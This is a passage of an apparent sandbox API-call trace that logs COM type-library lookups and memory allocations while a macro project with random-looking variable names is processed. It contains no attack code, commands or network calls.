ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.484] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.484] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80ece | out: _Dst=0x67c2d40) returned 0x0 [0069.484] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aUAxBCGA") returned 0x10258d [0069.484] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_aUAxBCGA" | out: _Dst="_B_var_aUAxBCGA") returned 0x0 [0069.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_aUAxBCGA") returned 16 [0069.485] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.485] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aUAxBCGA", lHashVal=0x10258d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.485] IUnknown:Release (This=0x665ba50) returned 0xd [0069.485] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.485] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aUAxBCGA", lHashVal=0x10258d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.485] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.486] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.486] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aUAxBCGA", lHashVal=0x10258d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.486] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.486] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.486] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aUAxBCGA", lHashVal=0x10258d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.486] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.486] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.486] IUnknown:Release (This=0x665ba50) returned 0xd [0069.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12fee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_aUAxBCGA") returned 16 [0069.486] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aUAxBCGA", lHashVal=0x10258d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x42007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x42007800000000, pDummy=0x0) returned 0x0 [0069.486] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80ece | out: _Dst=0x144ec0) returned 0x0 [0069.486] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QZ1QAc", lHashVal=0x10fc1b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80efa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QZ1QAc") returned 7 [0069.486] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QZ1QAc", lHashVal=0x10fc1b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80efa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QZ1QAc") returned 7 [0069.486] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QZ1QAc", lHashVal=0x10fc1b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QZ1QAc") returned 0x10fc1b [0069.486] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QZ1QAc" | out: _Dst="QZ1QAc") returned 0x0 [0069.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QZ1QAc") returned 7 [0069.487] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.487] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QZ1QAc", lHashVal=0x10fc1b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.487] IUnknown:Release (This=0x665ba50) returned 0xd [0069.487] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.487] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QZ1QAc", lHashVal=0x10fc1b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.487] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.487] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.487] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QZ1QAc", lHashVal=0x10fc1b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.487] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.487] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.487] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QZ1QAc", lHashVal=0x10fc1b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.487] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80efa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QZ1QAc") returned 7 [0069.487] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QZ1QAc", lHashVal=0x10fc1b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.487] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.487] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80efa | out: _Dst=0x67c2d40) returned 0x0 [0069.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QZ1QAc") returned 0x107685 [0069.487] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QZ1QAc" | out: _Dst="_B_var_QZ1QAc") returned 0x0 [0069.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QZ1QAc") returned 14 [0069.487] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.487] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QZ1QAc", lHashVal=0x107685, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.487] IUnknown:Release (This=0x665ba50) returned 0xd [0069.487] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.487] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QZ1QAc", lHashVal=0x107685, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.487] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.487] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.488] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QZ1QAc", lHashVal=0x107685, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.488] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.488] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.488] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QZ1QAc", lHashVal=0x107685, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.488] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.488] IMalloc:Realloc (This=0x7fefec05380, pv=0x6821210, cb=0x180) returned 0xafc7910 [0069.488] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0xa870000 [0069.488] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.488] IUnknown:Release (This=0x665ba50) returned 0xd [0069.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87001e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_QZ1QAc") returned 14 [0069.489] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QZ1QAc", lHashVal=0x107685, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0xaeff710, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0xaeff710, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.489] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80efa | out: _Dst=0x144ec0) returned 0x0 [0069.489] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FA1BkAo", lHashVal=0x10a6f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FA1BkAo") returned 8 [0069.489] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FA1BkAo", lHashVal=0x10a6f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FA1BkAo") returned 8 [0069.489] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FA1BkAo", lHashVal=0x10a6f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FA1BkAo") returned 0x10a6f2 [0069.489] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="FA1BkAo" | out: _Dst="FA1BkAo") returned 0x0 [0069.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="FA1BkAo") returned 8 [0069.489] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.489] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FA1BkAo", lHashVal=0x10a6f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.489] IUnknown:Release (This=0x665ba50) returned 0xd [0069.489] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.489] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FA1BkAo", lHashVal=0x10a6f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.489] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.489] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.489] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FA1BkAo", lHashVal=0x10a6f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.490] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.490] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.490] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FA1BkAo", lHashVal=0x10a6f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.490] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FA1BkAo") returned 8 [0069.490] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FA1BkAo", lHashVal=0x10a6f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.490] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.490] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80f22 | out: _Dst=0x67c2d40) returned 0x0 [0069.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FA1BkAo") returned 0x109af5 [0069.490] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_FA1BkAo" | out: _Dst="_B_var_FA1BkAo") returned 0x0 [0069.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_FA1BkAo") returned 15 [0069.490] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.490] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FA1BkAo", lHashVal=0x109af5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.490] IUnknown:Release (This=0x665ba50) returned 0xd [0069.490] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.490] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FA1BkAo", lHashVal=0x109af5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.490] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.490] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.490] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FA1BkAo", lHashVal=0x109af5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.490] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.490] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.490] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FA1BkAo", lHashVal=0x109af5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.490] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.490] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.490] IUnknown:Release (This=0x665ba50) returned 0xd [0069.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87004e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_FA1BkAo") returned 15 [0069.490] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FA1BkAo", lHashVal=0x109af5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0) returned 0x0 [0069.491] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80f22 | out: _Dst=0x144ec0) returned 0x0 [0069.491] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAXD4A", lHashVal=0x10ed01, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAXD4A") returned 7 [0069.491] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAXD4A", lHashVal=0x10ed01, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAXD4A") returned 7 [0069.491] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAXD4A", lHashVal=0x10ed01, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAXD4A") returned 0x10ed01 [0069.491] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Attribute", cchCount1=-1, lpString2="YAXD4A", cchCount2=-1) returned 1 [0069.491] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YAXD4A" | out: _Dst="YAXD4A") returned 0x0 [0069.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YAXD4A") returned 7 [0069.491] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.491] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAXD4A", lHashVal=0x10ed01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.491] IUnknown:Release (This=0x665ba50) returned 0xd [0069.491] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.491] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAXD4A", lHashVal=0x10ed01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.491] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.491] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.491] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAXD4A", lHashVal=0x10ed01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.491] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.492] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.492] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAXD4A", lHashVal=0x10ed01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.492] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80f4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAXD4A") returned 7 [0069.492] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAXD4A", lHashVal=0x10ed01, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.492] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.492] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80f4a | out: _Dst=0x67c2d40) returned 0x0 [0069.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAXD4A") returned 0x10676b [0069.492] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YAXD4A" | out: _Dst="_B_var_YAXD4A") returned 0x0 [0069.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YAXD4A") returned 14 [0069.492] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.492] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAXD4A", lHashVal=0x10676b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.492] IUnknown:Release (This=0x665ba50) returned 0xd [0069.492] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.492] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAXD4A", lHashVal=0x10676b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.492] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.492] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.492] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAXD4A", lHashVal=0x10676b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.492] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.492] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.492] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAXD4A", lHashVal=0x10676b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.492] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.492] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.492] IUnknown:Release (This=0x665ba50) returned 0xd [0069.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87007e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_YAXD4A") returned 14 [0069.492] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAXD4A", lHashVal=0x10676b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x34004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x34004400000000, pDummy=0x0) returned 0x0 [0069.493] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80f4a | out: _Dst=0x144ec0) returned 0x0 [0069.493] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.493] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.493] IUnknown:Release (This=0x665ba50) returned 0xd [0069.493] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.493] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.493] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.493] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.493] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.493] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xa880000 [0069.494] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.494] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.494] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.494] IUnknown:Release (This=0x665ba50) returned 0xd [0069.494] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.494] 